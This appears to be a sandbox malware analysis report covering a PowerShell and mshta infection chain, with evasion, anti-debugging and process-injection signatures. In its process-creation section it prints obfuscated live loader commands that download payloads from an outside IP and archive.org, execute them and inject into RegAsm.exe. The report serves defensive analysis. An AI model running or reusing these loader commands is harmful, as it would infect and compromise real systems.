                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040F7E2 Sleep,ExitProcess,11_2_0040F7E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_0041A7D9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7903
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1761
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1673
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3325
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6444
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 4619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 4848
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: foregroundWindowGot 1774
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432 | Thread sleep count: 7903 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2636 | Thread sleep count: 1761 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 984 | Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4720 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696 | Thread sleep count: 3325 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848 | Thread sleep count: 6444 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204 | Thread sleep time: -22136092888451448s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5572 | Thread sleep count: 259 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5572 | Thread sleep time: -129500s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712 | Thread sleep count: 4619 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712 | Thread sleep time: -13857000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712 | Thread sleep count: 4848 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5712 | Thread sleep time: -14544000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000006.00000003.2162243361.00000000051C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000003.00000002.2177854722.0000000008B6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0
                      Source: powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177473162.0000000008B52000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: wscript.exe, 00000006.00000003.2162243361.00000000051C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: powershell.exe, 00000009.00000002.2281731880.0000000007690000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                      Source: powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
                      Source: RegAsm.exe, 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node graph_11-48851
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00434A8A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00443355 mov eax, dword ptr fs:[00000030h] 11_2_00443355
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004120B2 GetProcessHeap,HeapFree,11_2_004120B2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043503C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043BB71
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434BD8 SetUnhandledExceptionFilter,11_2_00434BD8

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara match | File source: amsi32_1600.amsi.csv, type: OTHER
                      Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 97B008
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_00412132
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00419662 mouse_event,11_2_00419662
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'JDBGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlckRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhzd0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkNBeW1xSFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0RyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBncHlSc3VoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAia28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzUGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpncmZ6QmtEbGllICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQwRjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNC4xNjguMzIuMTQ4LzM0NS9uaWNlbWVldGluZ3NvZnBpY3R1cmVjbGVhcnRoaW5nc3RvYmUudElGIiwiJGVudjpBUFBEQVRBXG5pY2VtZWV0aW5nc29mcGljdHVyZWNsZWFydGhpbmdzdG9iLlZicyIsMCwwKTtzdGFyVC1zTGVFcCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcbmljZW1lZXRpbmdzb2ZwaWN0dXJlY2xlYXJ0aGluZ3N0b2IuVmJzIg=='+[CHAr]0x22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jdbgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10evblicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlckrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagihhzd0isc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagdknbew1xsfcsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagc0rylhvpbnqgicagicagicagicagicagicagicagicagicagicagicbmuixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbnchlsc3voktsnicagicagicagicagicagicagicagicagicagicagicaglw5btwugicagicagicagicagicagicagicagicagicagicagicaia28iicagicagicagicagicagicagicagicagicagicagicaglu5btuvzugfjrsagicagicagicagicagicagicagicagicagicagicagihpncmz6qmtebgllicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicqwrjo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewnc4xnjgumziumtq4lzm0ns9uawnlbwvldgluz3nvznbpy3r1cmvjbgvhcnroaw5nc3rvymuudelgiiwijgvudjpbufbeqvrbxg5py2vtzwv0aw5nc29mcgljdhvyzwnszwfydghpbmdzdg9illzicyismcwwkttzdgfyvc1ztgvfccgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcbmljzw1lzxrpbmdzb2zwawn0dxjly2xlyxj0agluz3n0b2iuvmjzig=='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
